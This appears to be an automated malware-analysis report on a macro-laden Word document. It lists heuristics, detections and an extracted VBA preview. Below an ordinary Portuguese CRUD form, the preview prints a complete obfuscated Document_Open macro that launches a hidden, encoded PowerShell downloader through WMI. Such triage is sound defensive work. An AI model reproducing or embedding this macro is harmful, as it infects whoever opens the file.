MALICIOUS (Risk Score: 272)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains VBA macros that use the `GetObject` and `CreateObject` methods to launch `winmgmts` to create a `Win32_Process`. This is a critical heuristic indicating the execution of a malicious payload. The document body explicitly instructs the user to enable editing and content, a common social engineering tactic to bypass macro security. The presence of the `macros.bas` file and the ClamAV detection further support its malicious nature as a downloader.
Heuristics (9)

- ClamAV: Doc.Downloader.Generic-7611954-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7611954-0
- VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. Matched line in script:
Sub Document_Open() Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _ Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBA … -
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning. Matched line in script: the same `Sub Document_Open()` line quoted above.
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: the same `Sub Document_Open()` line quoted above.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script:
  Sub Document_Open() Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13664 bytes |

SHA-256: 413f36734d8696e1c82a5b3472bc635831309e4f47b635fff71212c450911a22

Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 2 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub UserForm_Initialize()
Call PopulaCombos
Call EventosCampos
Call BuscaRegistros
End Sub
Private Sub UserForm_Terminate()
Set oLoja = Nothing
Set myRst = Nothing
Call Desconecta
End Sub
Private Sub btnIncluir_Click()
Call PosDecisaoTomada("Inclusao")
End Sub
Private Sub btnAlterar_Click()
Call PosDecisaoTomada("Alteracao")
End Sub
Private Sub btnExcluir_Click()
Call PosDecisaoTomada("Exclusao")
End Sub
Private Sub PosDecisaoTomada(Decisao As String)
btnCancelar.Visible = True: btnConfirmar.Visible = True
btnConfirmar.Caption = "Confirmar " & Decisao
btnCancelar.Caption = "Cancelar " & Decisao
btnIncluir.Visible = False: btnAlterar.Visible = False: btnExcluir.Visible = False
MultiPage1.Value = 1
If Decisao <> "Exclusao" Then
If Decisao = "Inclusao" Then
Call Campos("Limpar")
End If
Call Campos("Habilitar")
txbLoja.SetFocus
End If
MultiPage1.Pages(0).Enabled = False
End Sub
Private Sub btnConfirmar_Click()
Call Gravar(Replace(btnConfirmar.Caption, "Confirmar ", ""))
End Sub
Private Sub btnCancelar_Click()
btnIncluir.Visible = True: btnAlterar.Visible = True: btnExcluir.Visible = True
btnConfirmar.Visible = False: btnCancelar.Visible = False
Call Campos("Limpar")
Call Campos("Desabilitar")
btnAlterar.Enabled = False
btnExcluir.Enabled = False
btnIncluir.SetFocus
MultiPage1.Value = 0
lstPrincipal.ListIndex = -1 ' Tira a selecao
End Sub
Private Sub lstPrincipal_Change()
Dim n As Long
If lstPrincipal.ListIndex >= 0 Then
btnAlterar.Enabled = True
btnExcluir.Enabled = True
With oLoja
.CRUD eCrud.Read, (CLng(lstPrincipal.List(lstPrincipal.ListIndex, 1)))
lblCabID.Caption = IIf(.ID = 0, "", Format(.ID, "000000"))
lblCabLoja.Caption = .Loja
txbLoja.Text = .Loja
End With
End If
End Sub
Private Sub Campos(Acao As String)
Dim sDecisao As String
Dim b As Boolean
sDecisao = Replace(btnConfirmar.Caption, "Confirmar ", "")
If Acao <> "Limpar" Then
If Acao = "Desabilitar" Then
b = False
ElseIf Acao = "Habilitar" Then
b = True
End If
MultiPage1.Pages(0).Enabled = Not b
txbLoja.Enabled = b: lblLoja.Enabled = b
Else
lblCabID.Caption = ""
lblCabLoja.Caption = ""
txbLoja.Text = Empty
End If
End Sub
Private Sub lstPrincipalPopular(Pagina As Long)
Dim n As Byte
Dim vNascimento As Variant
Dim vSalario As Variant
Dim oLegenda As Control
' Limpa cores da legenda
For n = 1 To myRst.PageSize
Set oLegenda = Controls("l" & Format(n, "00")): oLegenda.BackColor = &H8000000F
Next n
' Define pagina que sera exibida do Recordset
myRst.AbsolutePage = Pagina
With lstPrincipal
.Clear ' Limpa conteudo
.ColumnCount = 2 ' Define numero de colunas
.ColumnWidths = "180 pt; 0pt;" ' Configura largura das colunas
.Font = "Consolas" ' Configura fonte
n = 1
While Not myRst.EOF = True And n <= myRst.PageSize
' Preenche ListBox
.AddItem
.List(.ListCount - 1, 0) = myRst.Fields("loja").Value
.List(.ListCount - 1, 1) = myRst.Fields("id").Value
' Colore a legenda
' Set oLegenda = Controls("l" & Format(n, "00"))
'
' If myRst.Fields("sexo").Value = "F" Then
' oLegenda.BackColor = &HFF80FF
' ElseIf myRst.Fields("sexo").Value = "M" Then
' oLegenda.BackColor = &HFF8080
' Else
' oLegenda.BackColor = &H8000000F
' End If
' Proximo registro
myRst.MoveNext: n = n + 1
Wend
End With
' Posiciona scroll de navegacao em paginas
lblPaginaAtual.Caption = Pagina
lblNumeroPaginas.Caption = myRst.PageCount
bAtualizaScrool = False: scrPagina.Value = CLng(lblPaginaAtual.Caption): bAtualizaScrool = True
lblTotalRegistros.Caption = Format(myRst.RecordCount, "#,##0")
' Trata os botoes de navegacao
Call TrataBotoesNavegacao
End Sub
Private Sub Gravar(Decisao As String)
Dim vbResposta As VbMsgBoxResult
Dim e As eCrud
vbResposta = MsgBox("Deseja realmente fazer a " & Decisao & "?", vbYesNo + vbQuestion, "Pergunta")
If vbResposta = vbYes Then
If Decisao <> "Exclusao" Then
If txbLoja.Text = Empty Then
MsgBox "Campo 'Loja' e obrigatorio", vbCritical: MultiPage1.Value = 1: txbLoja.SetFocus
Else
With oLoja
.Loja = Replace(txbLoja.Text, "'", "`")
If Decisao = "Inclusao" Then
.CRUD eCrud.Create
Else
.CRUD eCrud.Update, .ID
End If
End With
MsgBox Decisao & " realizada com sucesso.", vbInformation, Decisao & " de registro"
Call BuscaRegistros
End If
Else ' Se for exclusao
oLoja.CRUD eCrud.Delete, oLoja.ID
MsgBox Decisao & " realizada com sucesso.", vbInformation, Decisao & " de registro"
Call BuscaRegistros
End If
ElseIf vbResposta = vbNo Then
If Decisao = "Exclusao" Then
Call btnCancelar_Click
End If
End If
End Sub
Private Sub EventosCampos()
' Declara variaveis
Dim oControle As MSForms.Control
Dim oEvento As c__EventoCampo
Dim sTag As String
Dim sField() As String
' Laco para percorrer todos os TextBox e atribuir eventos
' de acordo com o tipo de cada campo
For Each oControle In Me.Controls
If Len(oControle.Tag) > 0 Then
If TypeName(oControle) = "TextBox" Then
Set oEvento = New c__EventoCampo
With oEvento
sField() = Split(oControle.Tag, ".")
oControle.ControlTipText = cat.Tables(sField(0)).Columns(sField(1)).Properties("Description").Value
.FieldType = cat.Tables(sField(0)).Columns(sField(1)).Type
.MaxLength = cat.Tables(sField(0)).Columns(sField(1)).DefinedSize
.Nullable = cat.Tables(sField(0)).Columns(sField(1)).Properties("Nullable")
Set .cGeneric = oControle
End With
colControles.Add oEvento
End If
End If
Next
End Sub
Private Sub btnFiltrar_Click()
Call BuscaRegistros
End Sub
Private Sub BuscaRegistros(Optional Ordem As String)
Dim n As Byte
Dim o As Control
Set myRst = oLoja.Todos(Ordem, True)
If myRst.PageCount > 0 Then
bAtualizaScrool = False
With scrPagina
.Max = myRst.PageCount
.Value = myRst.PageCount
End With
Call lstPrincipalPopular(myRst.PageCount)
Else
lstPrincipal.Clear
For n = 1 To myRst.PageSize
Set o = Controls("l" & Format(n, "00")): o.BackColor = &H8000000F
Next n
End If
Call btnCancelar_Click
End Sub
Private Sub TrataBotoesNavegacao()
If CLng(lblPaginaAtual.Caption) = myRst.PageCount And CLng(lblPaginaAtual.Caption) > 1 Then
btnPaginaInicial.Enabled = True
btnPaginaAnterior.Enabled = True
btnPaginaFinal.Enabled = False
btnPaginaSeguinte.Enabled = False
ElseIf CLng(lblPaginaAtual.Caption) < myRst.PageCount And CLng(lblPaginaAtual.Caption) = 1 Then
btnPaginaInicial.Enabled = False
btnPaginaAnterior.Enabled = False
btnPaginaFinal.Enabled = True
btnPaginaSeguinte.Enabled = True
ElseIf CLng(lblPaginaAtual.Caption) = myRst.PageCount And CLng(lblPaginaAtual.Caption) = 1 Then
btnPaginaInicial.Enabled = False
btnPaginaAnterior.Enabled = False
btnPaginaFinal.Enabled = False
btnPaginaSeguinte.Enabled = False
Else
btnPaginaInicial.Enabled = True
btnPaginaAnterior.Enabled = True
btnPaginaFinal.Enabled = True
btnPaginaSeguinte.Enabled = True
End If
End Sub
Private Sub btnPaginaInicial_Click()
Call lstPrincipalPopular(1)
End Sub
Private Sub btnPaginaAnterior_Click()
Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) - 1)
End Sub
Private Sub btnPaginaSeguinte_Click()
Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) + 1)
End Sub
Private Sub btnPaginaFinal_Click()
Call lstPrincipalPopular(myRst.PageCount)
End Sub
Private Sub btnRegistroAnterior_Click()
If lstPrincipal.ListIndex > 0 Then
lstPrincipal.ListIndex = lstPrincipal.ListIndex - 1
ElseIf lstPrincipal.ListIndex = 0 And CLng(lblPaginaAtual.Caption) > 1 Then
Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) - 1)
lstPrincipal.ListIndex = myRst.PageSize - 1
ElseIf CLng(lblPaginaAtual.Caption) = 1 And lstPrincipal.ListIndex = 0 Then
MsgBox "Primeiro registro"
Exit Sub
Else
lstPrincipal.ListIndex = -1
End If
End Sub
Private Sub btnRegistroSeguinte_Click()
If lstPrincipal.ListIndex = -1 Then
lstPrincipal.ListIndex = 0
ElseIf lstPrincipal.ListIndex = myRst.PageSize - 1 And CLng(lblPaginaAtual.Caption) < myRst.PageCount Then
Call lstPrincipalPopular(CLng(lblPaginaAtual.Caption) + 1)
lstPrincipal.ListIndex = 0
ElseIf CLng(lblPaginaAtual.Caption) = myRst.PageCount And (lstPrincipal.ListIndex + 1) = lstPrincipal.ListCount Then
MsgBox "Ultimo registro"
Exit Sub
Else
lstPrincipal.ListIndex = lstPrincipal.ListIndex + 1
End If
End Sub
Private Sub scrPagina_Change()
If bAtualizaScrool = True Then
Call lstPrincipalPopular(scrPagina.Value)
End If
End Sub
Private Sub PopulaCombos()
' With cbbSexo
' .Clear
' .ColumnCount = 2
' .ColumnWidths = "60pt; 0pt;"
'
' .AddItem
' .List(.ListCount - 1, 0) = "MASCULINO"
' .List(.ListCount - 1, 1) = "M"
'
' .AddItem
' .List(.ListCount - 1, 0) = "FEMININO"
' .List(.ListCount - 1, 1) = "F"
' End With
End Sub
Private Sub lstPrincipal_DblClick(ByVal Cancel As String)
MultiPage1.Value = 1
End Sub
Private Sub lblHdNome_Click()
Call BuscaRegistros("loja")
End Sub
Sub Document_Open()
Call GetObject("win" + "mgmts:ro" + "ot\c" + "imv2:Wi" + "n32_P" + "ro" + "cess"). _
Create(StrReverse("=AgZAUG" + "AyBAdAACA0BwcAkGAMBAdA4GAlBQbAUHAnBgcAEEAtAAIA0GAvBwYA4CAvBAZAkGA2BAIAMHAz" + "BQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAmBQZAIHA0BAIAEGAyBQZAYGAzBAIAUGAkBwbAMGAlBAZA0CAgAAbAkGA0BQdAQHAyBQ" + "ZAMGAgAwOAICAQBQTAUEAUBgOAYHAuBQZAQCAiAAIAgGA0BQYAAFAtAAIA4GAvBQaAQHAhBwYA8GAMBQLAQHAlBwUAACA7AgIA0GAvBwYA4CAlBQWAAHARBAXAAF" + "ANBQRAQFA6AgdA4GAlB" + "AJAICAsAgIAEGAyBQZAYGAzBAXAAFANBQRAQFA6AgdA4GAlBAJAICAs" + "AgIA0GAvBwYA4CAvBAZAkGA2BAXAAFANBQRAQFA6AgdA4GAlBAJAICAgAgbA8GApBAdAEGAuBQaAQHAzBQZAQEA" + "tAAIAQHAhBAZA4CAlBQWAAHARBwLAUGA0BQaAMHAuAgNAAHAyBwbAMGAvAwLAoDAwBAdAQHAoBALAQHAhBAZA4CArBgSAEGAlBgbA8CAlBAdAkGAzBgLAYDAwBgcA8GAjBwLA8CA6AAc" + "AQHA0BAaAwCA0BQYAQGAuAQZAoGABBQdAUGAJBwLAUGA0BQaAMHAuAgNAAHAyBwbAMGAvAwLAoDAwBAdAQHAoBAIAUGAjBgcAUHAvBwUA0" + "CAgAgcAUGAmBwcA4GAhBgcAQFAzBAdAkGACBQLAQHAyBQYAQHATBAIAsDAyBQZ" + "AYGAzBgbAEGAyBAVAMHA0BQaAIEA" + "gAQZAwGA1BAZA8GANBQLAQHAyBwbAAHAtBQS ne- neddih elytswodniw- llehsrewop"), Null, Null, TerfajK)
End Sub